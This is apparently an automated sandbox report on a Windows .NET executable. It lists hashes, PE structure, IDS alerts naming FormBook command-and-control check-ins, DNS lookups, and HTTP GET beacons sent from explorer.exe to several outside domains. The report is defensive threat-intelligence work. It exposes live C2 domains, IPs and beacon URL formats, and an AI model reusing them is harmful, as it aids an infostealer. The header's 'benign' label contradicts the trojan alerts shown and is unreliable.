                                        SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.8011036228862345
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:UgHXEfw1uL.exe
                                        File size:793'600 bytes
                                        MD5:e8fc0040e6882e0b9ea0e830b6d74d65
                                        SHA1:fb0b39b5f5c570c83b37a62a7b1563a48aefe2c4
                                        SHA256:685107cecf3e5ac7ad43e40a9fc7d8ea35179a40973938ff74e5813d0a61dffc
                                        SHA512:3082e92b4b1760b502d957c0017da96ee37801aad4ef1207947414c8d9fddd6748fcbd869006b0fa1ea6f1fda81c37eea1a0569f5ca28318b959ac40ebc08207
                                        SSDEEP:24576:kMVhudlFyhriuxuk69+DdDpFBjcGYfpBhtD/:DuX4Uux569e53Y3
                                        TLSH:FAF41269A5AC5BC7E17F43FA1A60D00583B16C39A432E30EACC1B5DB69B0F815770B5B
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l3de..............0.................. ...@....@.. ....................................@................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x4c2ea2
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6564336C [Mon Nov 27 06:13:00 2023 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc2e4f0x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x610.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xc08840x54.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xc0ea80xc1000False0.8929652080634715data7.810545429614008IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0xc40000x6100x800False0.33203125data3.4238156775430793IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xc60000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0xc40900x380data0.421875
                                        RT_MANIFEST0xc44200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                        DLLImport
                                        mscoree.dll_CorExeMain
                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.5195.35.38.749724802031412 11/27/23-12:12:31.959094TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.5195.35.38.7
                                        192.168.2.5172.67.198.10249725802031412 11/27/23-12:12:53.755681TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.5172.67.198.102
                                        192.168.2.5103.224.212.21649722802031412 11/27/23-12:11:51.038850TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972280192.168.2.5103.224.212.216
                                        192.168.2.53.33.130.19049723802031412 11/27/23-12:12:11.298434TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.53.33.130.190
                                        192.168.2.53.33.130.19049721802031412 11/27/23-12:10:28.412473TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.53.33.130.190
                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 27, 2023 12:09:48.751419067 CET4971780192.168.2.5130.61.77.41
                                        Nov 27, 2023 12:09:48.939482927 CET8049717130.61.77.41192.168.2.5
                                        Nov 27, 2023 12:09:49.451206923 CET4971780192.168.2.5130.61.77.41
                                        Nov 27, 2023 12:09:49.639358044 CET8049717130.61.77.41192.168.2.5
                                        Nov 27, 2023 12:09:50.154356956 CET4971780192.168.2.5130.61.77.41
                                        Nov 27, 2023 12:09:50.342334032 CET8049717130.61.77.41192.168.2.5
                                        Nov 27, 2023 12:09:50.857397079 CET4971780192.168.2.5130.61.77.41
                                        Nov 27, 2023 12:09:51.045553923 CET8049717130.61.77.41192.168.2.5
                                        Nov 27, 2023 12:09:51.560626030 CET4971780192.168.2.5130.61.77.41
                                        Nov 27, 2023 12:09:51.748748064 CET8049717130.61.77.41192.168.2.5
                                        Nov 27, 2023 12:09:52.706167936 CET4971880192.168.2.5130.61.77.41
                                        Nov 27, 2023 12:09:52.891055107 CET8049718130.61.77.41192.168.2.5
                                        Nov 27, 2023 12:09:53.404303074 CET4971880192.168.2.5130.61.77.41
                                        Nov 27, 2023 12:09:53.589586973 CET8049718130.61.77.41192.168.2.5
                                        Nov 27, 2023 12:09:54.091949940 CET4971880192.168.2.5130.61.77.41
                                        Nov 27, 2023 12:09:54.276489973 CET8049718130.61.77.41192.168.2.5
                                        Nov 27, 2023 12:09:54.779387951 CET4971880192.168.2.5130.61.77.41
                                        Nov 27, 2023 12:09:54.963709116 CET8049718130.61.77.41192.168.2.5
                                        Nov 27, 2023 12:09:55.466830969 CET4971880192.168.2.5130.61.77.41
                                        Nov 27, 2023 12:09:55.651158094 CET8049718130.61.77.41192.168.2.5
                                        Nov 27, 2023 12:10:28.318397045 CET4972180192.168.2.53.33.130.190
                                        Nov 27, 2023 12:10:28.412271023 CET80497213.33.130.190192.168.2.5
                                        Nov 27, 2023 12:10:28.412355900 CET4972180192.168.2.53.33.130.190
                                        Nov 27, 2023 12:10:28.412472963 CET4972180192.168.2.53.33.130.190
                                        Nov 27, 2023 12:10:28.506861925 CET80497213.33.130.190192.168.2.5
                                        Nov 27, 2023 12:10:28.797043085 CET80497213.33.130.190192.168.2.5
                                        Nov 27, 2023 12:10:28.797064066 CET80497213.33.130.190192.168.2.5
                                        Nov 27, 2023 12:10:28.797173977 CET4972180192.168.2.53.33.130.190
                                        Nov 27, 2023 12:10:28.799400091 CET4972180192.168.2.53.33.130.190
                                        Nov 27, 2023 12:10:28.813455105 CET80497213.33.130.190192.168.2.5
                                        Nov 27, 2023 12:10:28.813523054 CET4972180192.168.2.53.33.130.190
                                        Nov 27, 2023 12:10:28.893285036 CET80497213.33.130.190192.168.2.5
                                        Nov 27, 2023 12:11:50.880179882 CET4972280192.168.2.5103.224.212.216
                                        Nov 27, 2023 12:11:51.038614035 CET8049722103.224.212.216192.168.2.5
                                        Nov 27, 2023 12:11:51.038731098 CET4972280192.168.2.5103.224.212.216
                                        Nov 27, 2023 12:11:51.038850069 CET4972280192.168.2.5103.224.212.216
                                        Nov 27, 2023 12:11:51.240426064 CET8049722103.224.212.216192.168.2.5
                                        Nov 27, 2023 12:11:51.240446091 CET8049722103.224.212.216192.168.2.5
                                        Nov 27, 2023 12:11:51.240459919 CET8049722103.224.212.216192.168.2.5
                                        Nov 27, 2023 12:11:51.240688086 CET4972280192.168.2.5103.224.212.216
                                        Nov 27, 2023 12:11:51.240756035 CET4972280192.168.2.5103.224.212.216
                                        Nov 27, 2023 12:11:51.399039984 CET8049722103.224.212.216192.168.2.5
                                        Nov 27, 2023 12:12:11.204345942 CET4972380192.168.2.53.33.130.190
                                        Nov 27, 2023 12:12:11.298223972 CET80497233.33.130.190192.168.2.5
                                        Nov 27, 2023 12:12:11.298310041 CET4972380192.168.2.53.33.130.190
                                        Nov 27, 2023 12:12:11.298434019 CET4972380192.168.2.53.33.130.190
                                        Nov 27, 2023 12:12:11.392136097 CET80497233.33.130.190192.168.2.5
                                        Nov 27, 2023 12:12:11.397602081 CET80497233.33.130.190192.168.2.5
                                        Nov 27, 2023 12:12:11.397622108 CET80497233.33.130.190192.168.2.5
                                        Nov 27, 2023 12:12:11.397751093 CET4972380192.168.2.53.33.130.190
                                        Nov 27, 2023 12:12:11.400927067 CET4972380192.168.2.53.33.130.190
                                        Nov 27, 2023 12:12:11.412245035 CET80497233.33.130.190192.168.2.5
                                        Nov 27, 2023 12:12:11.412297964 CET4972380192.168.2.53.33.130.190
                                        Nov 27, 2023 12:12:11.494611025 CET80497233.33.130.190192.168.2.5
                                        Nov 27, 2023 12:12:31.807857037 CET4972480192.168.2.5195.35.38.7
                                        Nov 27, 2023 12:12:31.956748009 CET8049724195.35.38.7192.168.2.5
                                        Nov 27, 2023 12:12:31.958307981 CET4972480192.168.2.5195.35.38.7
                                        Nov 27, 2023 12:12:31.959094048 CET4972480192.168.2.5195.35.38.7
                                        Nov 27, 2023 12:12:32.107880116 CET8049724195.35.38.7192.168.2.5
                                        Nov 27, 2023 12:12:32.107918978 CET8049724195.35.38.7192.168.2.5
                                        Nov 27, 2023 12:12:32.108125925 CET8049724195.35.38.7192.168.2.5
                                        Nov 27, 2023 12:12:32.108222008 CET4972480192.168.2.5195.35.38.7
                                        Nov 27, 2023 12:12:32.108222008 CET4972480192.168.2.5195.35.38.7
                                        Nov 27, 2023 12:12:32.257088900 CET8049724195.35.38.7192.168.2.5
                                        Nov 27, 2023 12:12:52.422250986 CET4972580192.168.2.5172.67.198.102
                                        Nov 27, 2023 12:12:52.547069073 CET8049725172.67.198.102192.168.2.5
                                        Nov 27, 2023 12:12:52.547250986 CET4972580192.168.2.5172.67.198.102
                                        Nov 27, 2023 12:12:53.755681038 CET4972580192.168.2.5172.67.198.102
                                        Nov 27, 2023 12:12:53.879565001 CET8049725172.67.198.102192.168.2.5
                                        Nov 27, 2023 12:12:54.095381021 CET8049725172.67.198.102192.168.2.5
                                        Nov 27, 2023 12:12:54.095458984 CET8049725172.67.198.102192.168.2.5
                                        Nov 27, 2023 12:12:54.095554113 CET4972580192.168.2.5172.67.198.102
                                        Nov 27, 2023 12:12:54.202657938 CET4972580192.168.2.5172.67.198.102
                                        Nov 27, 2023 12:12:54.327029943 CET8049725172.67.198.102192.168.2.5
                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 27, 2023 12:09:48.609153032 CET5083753192.168.2.51.1.1.1
                                        Nov 27, 2023 12:09:48.750152111 CET53508371.1.1.1192.168.2.5
                                        Nov 27, 2023 12:09:52.570972919 CET4980653192.168.2.51.1.1.1
                                        Nov 27, 2023 12:09:52.696459055 CET53498061.1.1.1192.168.2.5
                                        Nov 27, 2023 12:10:08.030184984 CET5362753192.168.2.51.1.1.1
                                        Nov 27, 2023 12:10:08.156218052 CET53536271.1.1.1192.168.2.5
                                        Nov 27, 2023 12:10:28.186384916 CET6292653192.168.2.51.1.1.1
                                        Nov 27, 2023 12:10:28.317140102 CET53629261.1.1.1192.168.2.5
                                        Nov 27, 2023 12:10:48.956370115 CET5690853192.168.2.51.1.1.1
                                        Nov 27, 2023 12:10:49.082743883 CET53569081.1.1.1192.168.2.5
                                        Nov 27, 2023 12:11:09.375736952 CET5528953192.168.2.51.1.1.1
                                        Nov 27, 2023 12:11:09.501643896 CET53552891.1.1.1192.168.2.5
                                        Nov 27, 2023 12:11:50.612092018 CET5661653192.168.2.51.1.1.1
                                        Nov 27, 2023 12:11:50.878679037 CET53566161.1.1.1192.168.2.5
                                        Nov 27, 2023 12:12:11.014244080 CET5353453192.168.2.51.1.1.1
                                        Nov 27, 2023 12:12:11.203111887 CET53535341.1.1.1192.168.2.5
                                        Nov 27, 2023 12:12:31.427356958 CET5133253192.168.2.51.1.1.1
                                        Nov 27, 2023 12:12:31.806691885 CET53513321.1.1.1192.168.2.5
                                        Nov 27, 2023 12:12:52.086749077 CET6269953192.168.2.51.1.1.1
                                        Nov 27, 2023 12:12:52.420578003 CET53626991.1.1.1192.168.2.5
                                        Nov 27, 2023 12:13:12.450062037 CET5250253192.168.2.51.1.1.1
                                        Nov 27, 2023 12:13:13.435719013 CET5250253192.168.2.51.1.1.1
                                        Nov 27, 2023 12:13:13.725692034 CET53525021.1.1.1192.168.2.5
                                        Nov 27, 2023 12:13:13.725713015 CET53525021.1.1.1192.168.2.5
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 27, 2023 12:09:48.609153032 CET192.168.2.51.1.1.10x80e7Standard query (0)www.fnb.gayA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:09:52.570972919 CET192.168.2.51.1.1.10xe2eaStandard query (0)www.fnb.gayA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:10:08.030184984 CET192.168.2.51.1.1.10xaa3Standard query (0)www.fixerradvisory.comA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:10:28.186384916 CET192.168.2.51.1.1.10x812Standard query (0)www.millerstoehr.comA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:10:48.956370115 CET192.168.2.51.1.1.10x9e6eStandard query (0)www.bolfm.comA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:11:09.375736952 CET192.168.2.51.1.1.10x6ac3Standard query (0)www.videopromarket.comA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:11:50.612092018 CET192.168.2.51.1.1.10x194bStandard query (0)www.biddrivego.comA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:12:11.014244080 CET192.168.2.51.1.1.10x112fStandard query (0)www.cascadefinnish.comA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:12:31.427356958 CET192.168.2.51.1.1.10xe63dStandard query (0)www.alnawrasalrahhal.comA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:12:52.086749077 CET192.168.2.51.1.1.10xe267Standard query (0)www.tqmsn.comA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:13:12.450062037 CET192.168.2.51.1.1.10x1d6dStandard query (0)www.odisexport.comA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:13:13.435719013 CET192.168.2.51.1.1.10x1d6dStandard query (0)www.odisexport.comA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 27, 2023 12:09:48.750152111 CET1.1.1.1192.168.2.50x80e7No error (0)www.fnb.gay130.61.77.41A (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:09:52.696459055 CET1.1.1.1192.168.2.50xe2eaNo error (0)www.fnb.gay130.61.77.41A (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:10:08.156218052 CET1.1.1.1192.168.2.50xaa3Name error (3)www.fixerradvisory.comnonenoneA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:10:28.317140102 CET1.1.1.1192.168.2.50x812No error (0)www.millerstoehr.commillerstoehr.comCNAME (Canonical name)IN (0x0001)false
                                        Nov 27, 2023 12:10:28.317140102 CET1.1.1.1192.168.2.50x812No error (0)millerstoehr.com3.33.130.190A (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:10:28.317140102 CET1.1.1.1192.168.2.50x812No error (0)millerstoehr.com15.197.148.33A (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:10:49.082743883 CET1.1.1.1192.168.2.50x9e6eName error (3)www.bolfm.comnonenoneA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:11:09.501643896 CET1.1.1.1192.168.2.50x6ac3Name error (3)www.videopromarket.comnonenoneA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:11:50.878679037 CET1.1.1.1192.168.2.50x194bNo error (0)www.biddrivego.com103.224.212.216A (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:12:11.203111887 CET1.1.1.1192.168.2.50x112fNo error (0)www.cascadefinnish.comcascadefinnish.comCNAME (Canonical name)IN (0x0001)false
                                        Nov 27, 2023 12:12:11.203111887 CET1.1.1.1192.168.2.50x112fNo error (0)cascadefinnish.com3.33.130.190A (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:12:11.203111887 CET1.1.1.1192.168.2.50x112fNo error (0)cascadefinnish.com15.197.148.33A (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:12:31.806691885 CET1.1.1.1192.168.2.50xe63dNo error (0)www.alnawrasalrahhal.comalnawrasalrahhal.comCNAME (Canonical name)IN (0x0001)false
                                        Nov 27, 2023 12:12:31.806691885 CET1.1.1.1192.168.2.50xe63dNo error (0)alnawrasalrahhal.com195.35.38.7A (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:12:52.420578003 CET1.1.1.1192.168.2.50xe267No error (0)www.tqmsn.com172.67.198.102A (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:12:52.420578003 CET1.1.1.1192.168.2.50xe267No error (0)www.tqmsn.com104.21.74.46A (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:13:13.725692034 CET1.1.1.1192.168.2.50x1d6dServer failure (2)www.odisexport.comnonenoneA (IP address)IN (0x0001)false
                                        Nov 27, 2023 12:13:13.725713015 CET1.1.1.1192.168.2.50x1d6dServer failure (2)www.odisexport.comnonenoneA (IP address)IN (0x0001)false
                                        • www.millerstoehr.com
                                        • www.biddrivego.com
                                        • www.cascadefinnish.com
                                        • www.alnawrasalrahhal.com
                                        • www.tqmsn.com
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.5497213.33.130.190801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 27, 2023 12:10:28.412472963 CET229OUTGET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=DnQ2mpp/p9SrOrTdvvrBBnHCHwlyRJxHHfFV5U6skaUaBlNFsDA0N9XRwg9RyRq/LEOv HTTP/1.1
                                        Host: www.millerstoehr.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 27, 2023 12:10:28.797043085 CET514INHTTP/1.1 403 Forbidden
                                        Server: openresty
                                        Date: Mon, 27 Nov 2023 11:10:28 GMT
                                        Content-Type: text/html
                                        Content-Length: 291
                                        Connection: close
                                        ETag: "6552b2f2-123"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.549722103.224.212.216801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 27, 2023 12:11:51.038850069 CET227OUTGET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbk HTTP/1.1
                                        Host: www.biddrivego.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 27, 2023 12:11:51.240446091 CET491INHTTP/1.1 302 Found
                                        date: Mon, 27 Nov 2023 11:11:51 GMT
                                        server: Apache
                                        set-cookie: __tad=1701083511.8561309; expires=Thu, 24-Nov-2033 11:11:51 GMT; Max-Age=315360000
                                        location: http://ww25.biddrivego.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbk&subid1=20231127-2211-5178-8a11-d53c1cde7dc9
                                        content-length: 2
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        Data Raw: 0a 0a
                                        Data Ascii:


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.5497233.33.130.190801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 27, 2023 12:12:11.298434019 CET231OUTGET /bp31/?yzuD_Vc=ieodBXaeqV8oce4b5CZNIl9GV0f6ZOMGR+lwHtCXy9ziWDHkC3UxRT7a3Y07V5Vcpr7g&wdR=K48xltk0G0VLCVcp HTTP/1.1
                                        Host: www.cascadefinnish.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 27, 2023 12:12:11.397602081 CET514INHTTP/1.1 403 Forbidden
                                        Server: openresty
                                        Date: Mon, 27 Nov 2023 11:12:11 GMT
                                        Content-Type: text/html
                                        Content-Length: 291
                                        Connection: close
                                        ETag: "6552b2aa-123"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.549724195.35.38.7801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 27, 2023 12:12:31.959094048 CET233OUTGET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=De6ETpvSJNr0YkBlOa1evZHTiRZW0fGv0LVlBpygzy/UcKoa1AD6rYeri5b5ah2pQQV4 HTTP/1.1
                                        Host: www.alnawrasalrahhal.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 27, 2023 12:12:32.107918978 CET1137INHTTP/1.1 301 Moved Permanently
                                        Connection: close
